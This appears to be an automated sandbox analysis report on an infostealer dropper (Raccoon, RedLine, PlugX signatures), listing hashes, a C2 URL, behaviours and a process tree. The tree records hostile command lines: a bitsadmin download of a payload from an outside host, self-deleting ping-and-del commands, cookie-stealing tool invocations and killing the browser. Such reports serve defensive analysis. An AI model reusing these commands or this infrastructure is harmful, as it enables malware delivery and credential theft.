Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1804s
  • max time network
    1813s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    04-05-2021 20:23

General

  • Target

    Install.exe

  • Size

    497KB

  • MD5

    41a5f4fd1ea7cac4aa94a87aebccfef0

  • SHA1

    0d0abf079413a4c773754bf4fda338dc5b9a8ddc

  • SHA256

    97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

  • SHA512

    5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

Malware Config

Extracted

Family

raccoon

Botnet

9afb493c6f82d08075dbbfa7d93ce97f1dbf4733

Attributes
  • url4cnc

    https://tttttt.me/antitantief3

rc4.plain
rc4.plain

Signatures

  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 4 IoCs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Blocklisted process makes network request 48 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 41 IoCs
  • UPX packed file 8 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 15 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 35 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 16 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 7 IoCs
  • Runs ping.exe 1 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:296
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s UserManager
      1⤵
        PID:1380
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2568
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
          PID:2980
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s WpnService
          1⤵
            PID:2688
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
            1⤵
              PID:2664
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
              1⤵
                PID:2548
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                1⤵
                  PID:1816
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s SENS
                  1⤵
                    PID:1352
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Themes
                    1⤵
                      PID:1188
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                      1⤵
                        PID:1128
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                        1⤵
                        • Drops file in System32 directory
                        PID:1068
                      • C:\Users\Admin\AppData\Local\Temp\Install.exe
                        "C:\Users\Admin\AppData\Local\Temp\Install.exe"
                        1⤵
                        • Suspicious use of WriteProcessMemory
                        PID:992
                        • C:\Users\Admin\AppData\Local\Temp\is-3T9DQ.tmp\Install.tmp
                          "C:\Users\Admin\AppData\Local\Temp\is-3T9DQ.tmp\Install.tmp" /SL5="$20118,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install.exe"
                          2⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of WriteProcessMemory
                          PID:996
                          • C:\Users\Admin\AppData\Local\Temp\is-5N9UM.tmp\Ultra.exe
                            "C:\Users\Admin\AppData\Local\Temp\is-5N9UM.tmp\Ultra.exe" /S /UID=burnerch1
                            3⤵
                            • Drops file in Drivers directory
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Drops file in Program Files directory
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:2620
                            • C:\Program Files\Uninstall Information\ZVMZNPLUVE\ultramediaburner.exe
                              "C:\Program Files\Uninstall Information\ZVMZNPLUVE\ultramediaburner.exe" /VERYSILENT
                              4⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:652
                              • C:\Users\Admin\AppData\Local\Temp\is-8INPS.tmp\ultramediaburner.tmp
                                "C:\Users\Admin\AppData\Local\Temp\is-8INPS.tmp\ultramediaburner.tmp" /SL5="$4002E,281924,62464,C:\Program Files\Uninstall Information\ZVMZNPLUVE\ultramediaburner.exe" /VERYSILENT
                                5⤵
                                • Executes dropped EXE
                                • Drops file in Program Files directory
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of WriteProcessMemory
                                PID:2308
                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                  "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                  6⤵
                                  • Executes dropped EXE
                                  PID:2512
                            • C:\Users\Admin\AppData\Local\Temp\df-f5d69-855-c1ca3-fc74e338e61f3\Sipegalulae.exe
                              "C:\Users\Admin\AppData\Local\Temp\df-f5d69-855-c1ca3-fc74e338e61f3\Sipegalulae.exe"
                              4⤵
                              • Executes dropped EXE
                              • Checks computer location settings
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3392
                            • C:\Users\Admin\AppData\Local\Temp\41-d8221-9a1-04d97-ebe3a50f32b70\Vucivelishe.exe
                              "C:\Users\Admin\AppData\Local\Temp\41-d8221-9a1-04d97-ebe3a50f32b70\Vucivelishe.exe"
                              4⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:3156
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\p04gn5t1.bsa\sskiper.exe /s & exit
                                5⤵
                                • Suspicious use of WriteProcessMemory
                                PID:4296
                                • C:\Users\Admin\AppData\Local\Temp\p04gn5t1.bsa\sskiper.exe
                                  C:\Users\Admin\AppData\Local\Temp\p04gn5t1.bsa\sskiper.exe /s
                                  6⤵
                                  • Executes dropped EXE
                                  • Suspicious use of WriteProcessMemory
                                  PID:4560
                                  • C:\Users\Admin\AppData\Local\Temp\478699307.exe
                                    C:\Users\Admin\AppData\Local\Temp\478699307.exe
                                    7⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4476
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                      C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                      8⤵
                                        PID:2476
                                    • C:\Users\Admin\AppData\Local\Temp\303191066.exe
                                      C:\Users\Admin\AppData\Local\Temp\303191066.exe
                                      7⤵
                                      • Executes dropped EXE
                                      • Suspicious use of SetThreadContext
                                      PID:2184
                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                        8⤵
                                          PID:6016
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\p04gn5t1.bsa\sskiper.exe & exit
                                        7⤵
                                          PID:5836
                                          • C:\Windows\SysWOW64\PING.EXE
                                            ping 0
                                            8⤵
                                            • Runs ping.exe
                                            PID:5444
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hyua0xuf.hkg\KiffMainE1.exe & exit
                                      5⤵
                                      • Suspicious use of WriteProcessMemory
                                      PID:4724
                                      • C:\Users\Admin\AppData\Local\Temp\hyua0xuf.hkg\KiffMainE1.exe
                                        C:\Users\Admin\AppData\Local\Temp\hyua0xuf.hkg\KiffMainE1.exe
                                        6⤵
                                        • Executes dropped EXE
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4904
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2ojxxoxv.td0\001.exe & exit
                                      5⤵
                                      • Suspicious use of WriteProcessMemory
                                      PID:4960
                                      • C:\Users\Admin\AppData\Local\Temp\2ojxxoxv.td0\001.exe
                                        C:\Users\Admin\AppData\Local\Temp\2ojxxoxv.td0\001.exe
                                        6⤵
                                        • Executes dropped EXE
                                        PID:1272
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\timpoxqp.zux\setup.exe /eufour & exit
                                      5⤵
                                        PID:5088
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4cwblfu0.qzh\installer.exe /qn CAMPAIGN="654" & exit
                                        5⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:4148
                                        • C:\Users\Admin\AppData\Local\Temp\4cwblfu0.qzh\installer.exe
                                          C:\Users\Admin\AppData\Local\Temp\4cwblfu0.qzh\installer.exe /qn CAMPAIGN="654"
                                          6⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Enumerates connected drives
                                          • Modifies system certificate store
                                          • Suspicious use of AdjustPrivilegeToken
                                          • Suspicious use of FindShellTrayWindow
                                          PID:4368
                                          • C:\Windows\SysWOW64\msiexec.exe
                                            "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\4cwblfu0.qzh\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\4cwblfu0.qzh\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1619908042 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                            7⤵
                                              PID:5336
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\swgnuo30.svm\gpooe.exe & exit
                                          5⤵
                                          • Suspicious use of WriteProcessMemory
                                          PID:4432
                                          • C:\Users\Admin\AppData\Local\Temp\swgnuo30.svm\gpooe.exe
                                            C:\Users\Admin\AppData\Local\Temp\swgnuo30.svm\gpooe.exe
                                            6⤵
                                            • Executes dropped EXE
                                            • Adds Run key to start application
                                            • Suspicious use of WriteProcessMemory
                                            PID:4708
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              7⤵
                                              • Executes dropped EXE
                                              PID:5060
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              7⤵
                                              • Executes dropped EXE
                                              PID:4892
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              7⤵
                                              • Executes dropped EXE
                                              PID:3368
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              7⤵
                                              • Executes dropped EXE
                                              PID:612
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\o1cx41cc.cf4\setup.exe /mixfour & exit
                                          5⤵
                                            PID:4892
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wdixighw.ob2\sskiper.exe /s & exit
                                            5⤵
                                            • Suspicious use of WriteProcessMemory
                                            PID:1400
                                            • C:\Users\Admin\AppData\Local\Temp\wdixighw.ob2\sskiper.exe
                                              C:\Users\Admin\AppData\Local\Temp\wdixighw.ob2\sskiper.exe /s
                                              6⤵
                                              • Executes dropped EXE
                                              • Suspicious use of WriteProcessMemory
                                              PID:4292
                                              • C:\Users\Admin\AppData\Local\Temp\266360057.exe
                                                C:\Users\Admin\AppData\Local\Temp\266360057.exe
                                                7⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetThreadContext
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4752
                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                  8⤵
                                                    PID:1372
                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                    C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                    8⤵
                                                      PID:1408
                                                  • C:\Users\Admin\AppData\Local\Temp\647359144.exe
                                                    C:\Users\Admin\AppData\Local\Temp\647359144.exe
                                                    7⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of SetThreadContext
                                                    PID:5948
                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      8⤵
                                                        PID:3508
                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                        8⤵
                                                          PID:5552
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\wdixighw.ob2\sskiper.exe & exit
                                                        7⤵
                                                          PID:5656
                                                          • C:\Windows\SysWOW64\PING.EXE
                                                            ping 0
                                                            8⤵
                                                            • Loads dropped DLL
                                                            • Runs ping.exe
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:5272
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gh10ietq.et2\google-game.exe & exit
                                                      5⤵
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:588
                                                      • C:\Users\Admin\AppData\Local\Temp\gh10ietq.et2\google-game.exe
                                                        C:\Users\Admin\AppData\Local\Temp\gh10ietq.et2\google-game.exe
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:2256
                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                          "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                                                          7⤵
                                                            PID:5272
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qwq0m4gv.q3q\huesaa.exe & exit
                                                        5⤵
                                                          PID:4868
                                                          • C:\Users\Admin\AppData\Local\Temp\qwq0m4gv.q3q\huesaa.exe
                                                            C:\Users\Admin\AppData\Local\Temp\qwq0m4gv.q3q\huesaa.exe
                                                            6⤵
                                                            • Executes dropped EXE
                                                            PID:4444
                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                              7⤵
                                                              • Executes dropped EXE
                                                              PID:5220
                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                              7⤵
                                                                PID:5836
                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                7⤵
                                                                • Executes dropped EXE
                                                                PID:4380
                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                7⤵
                                                                • Executes dropped EXE
                                                                PID:4300
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nafnytxu.03b\jvppp.exe & exit
                                                            5⤵
                                                              PID:5136
                                                              • C:\Users\Admin\AppData\Local\Temp\nafnytxu.03b\jvppp.exe
                                                                C:\Users\Admin\AppData\Local\Temp\nafnytxu.03b\jvppp.exe
                                                                6⤵
                                                                • Executes dropped EXE
                                                                PID:5260
                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                  7⤵
                                                                    PID:5408
                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                    7⤵
                                                                      PID:5948
                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                      7⤵
                                                                      • Executes dropped EXE
                                                                      PID:4424
                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                      7⤵
                                                                      • Executes dropped EXE
                                                                      PID:4372
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jjtci41m.v2v\askinstall39.exe & exit
                                                                  5⤵
                                                                    PID:5436
                                                                    • C:\Users\Admin\AppData\Local\Temp\jjtci41m.v2v\askinstall39.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\jjtci41m.v2v\askinstall39.exe
                                                                      6⤵
                                                                        PID:6080
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          cmd.exe /c taskkill /f /im chrome.exe
                                                                          7⤵
                                                                            PID:6004
                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                              taskkill /f /im chrome.exe
                                                                              8⤵
                                                                              • Kills process with taskkill
                                                                              PID:4760
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\q1uk4scq.lbu\setup.exe & exit
                                                                        5⤵
                                                                          PID:6008
                                                                          • C:\Users\Admin\AppData\Local\Temp\q1uk4scq.lbu\setup.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\q1uk4scq.lbu\setup.exe
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            PID:4948
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\q1uk4scq.lbu\setup.exe"
                                                                              7⤵
                                                                                PID:5088
                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                  ping 1.1.1.1 -n 1 -w 3000
                                                                                  8⤵
                                                                                  • Runs ping.exe
                                                                                  PID:5972
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\12lff5p3.fzt\y1.exe & exit
                                                                            5⤵
                                                                              PID:5548
                                                                              • C:\Users\Admin\AppData\Local\Temp\12lff5p3.fzt\y1.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\12lff5p3.fzt\y1.exe
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                • Loads dropped DLL
                                                                                PID:5380
                                                                                • C:\Users\Admin\AppData\Local\Temp\em5bWD89HQ.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\em5bWD89HQ.exe"
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  • Modifies system certificate store
                                                                                  PID:5096
                                                                                  • C:\Users\Admin\AppData\Roaming\1620167454658.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\1620167454658.exe" /sjson "C:\Users\Admin\AppData\Roaming\1620167454658.txt"
                                                                                    8⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:4460
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\em5bWD89HQ.exe"
                                                                                    8⤵
                                                                                      PID:5784
                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                        ping 127.0.0.1 -n 3
                                                                                        9⤵
                                                                                        • Runs ping.exe
                                                                                        PID:4312
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\12lff5p3.fzt\y1.exe"
                                                                                    7⤵
                                                                                      PID:6036
                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                        timeout /T 10 /NOBREAK
                                                                                        8⤵
                                                                                        • Delays execution with timeout.exe
                                                                                        PID:6000
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dfa4xzcp.qti\SunLabsPlayer.exe /S & exit
                                                                                  5⤵
                                                                                    PID:5620
                                                                                    • C:\Users\Admin\AppData\Local\Temp\dfa4xzcp.qti\SunLabsPlayer.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\dfa4xzcp.qti\SunLabsPlayer.exe /S
                                                                                      6⤵
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      • Drops file in Program Files directory
                                                                                      PID:5072
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsuAA4C.tmp\tempfile.ps1"
                                                                                        7⤵
                                                                                          PID:5284
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsuAA4C.tmp\tempfile.ps1"
                                                                                          7⤵
                                                                                            PID:4156
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsuAA4C.tmp\tempfile.ps1"
                                                                                            7⤵
                                                                                              PID:5208
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsuAA4C.tmp\tempfile.ps1"
                                                                                              7⤵
                                                                                                PID:4756
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsuAA4C.tmp\tempfile.ps1"
                                                                                                7⤵
                                                                                                  PID:5784
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsuAA4C.tmp\tempfile.ps1"
                                                                                                  7⤵
                                                                                                    PID:5524
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsuAA4C.tmp\tempfile.ps1"
                                                                                                    7⤵
                                                                                                    • Checks for any installed AV software in registry
                                                                                                    PID:1336
                                                                                                  • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                    "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                                                    7⤵
                                                                                                    • Download via BitsAdmin
                                                                                                    PID:5016
                                                                                                  • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                    "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pQIexLbqsL0IakhO -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                    7⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Drops file in Program Files directory
                                                                                                    PID:5644
                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      8⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:6080
                                                                                                  • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                    "C:\Program Files (x86)\lighteningplayer\data_load.exe" -p2dMDO9fcSuQNujK -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                    7⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:4132
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsuAA4C.tmp\tempfile.ps1"
                                                                                                    7⤵
                                                                                                      PID:4784
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsuAA4C.tmp\tempfile.ps1"
                                                                                                      7⤵
                                                                                                        PID:4864
                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          8⤵
                                                                                                            PID:5336
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsuAA4C.tmp\tempfile.ps1"
                                                                                                          7⤵
                                                                                                            PID:4240
                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsuAA4C.tmp\tempfile.ps1"
                                                                                                            7⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:5836
